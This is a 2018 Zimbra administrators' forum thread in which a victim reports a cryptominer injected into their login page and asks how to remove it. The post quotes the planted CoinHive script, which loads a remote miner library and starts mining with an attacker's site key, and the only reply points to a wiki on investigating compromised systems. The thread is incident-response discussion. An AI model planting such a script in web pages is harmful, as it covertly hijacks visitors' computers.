coin miner attack

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
ecunanan
Posts: 1
Joined: Fri Sep 14, 2018 1:27 am

coin miner attack

Postby ecunanan » Fri Sep 14, 2018 8:37 am

We recently have an issue where in our login page run a script for coin miner. we need to remove the script from the login page since our site is being tag as a coinminer site.
We found this said script inside the login_jsp.java file and compiles to login_jsp.class. both file has Nov 2017 date stamp.
#<script src="https://coinhive.com/lib/coinhive.min.js"></script>
#<script>
# var miner = new CoinHive.Anonymous('dLbuCDfqubF6T7taC7cXcnkSFV20l5wp', {throttle: 0.5});
#
# // Only start on non-mobile devices and if not opted-out
# // in the last 14400 seconds (4 hours):
# if (!miner.isMobile() && !miner.didOptOut(14400)) {
# miner.start();
# }
#</script>
#<script>
How could we remove this from our login page?


User avatar
L. Mark Stone
Elite member
Elite member
Posts: 1887
Joined: Wed Oct 09, 2013 11:35 am
Location: Portland, Maine
ZCS/ZD Version: 8.8.10 Network Edition
Contact:

Re: coin miner attack

Postby L. Mark Stone » Fri Sep 14, 2018 2:45 pm

You don't say what version of Zimbra you are running.

If an older version, then Zimbra published this wiki to help:
https://wiki.zimbra.com/wiki/Investigat ... ng_Systems

Hope that helps,
Mark
___________________________________
L. Mark Stone
Mission Critical Email - Zimbra VAR/BSP/Training Partner https://www.missioncriticalemail.com/
Zeta Alliance http://www.zetalliance.org/

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 33 guests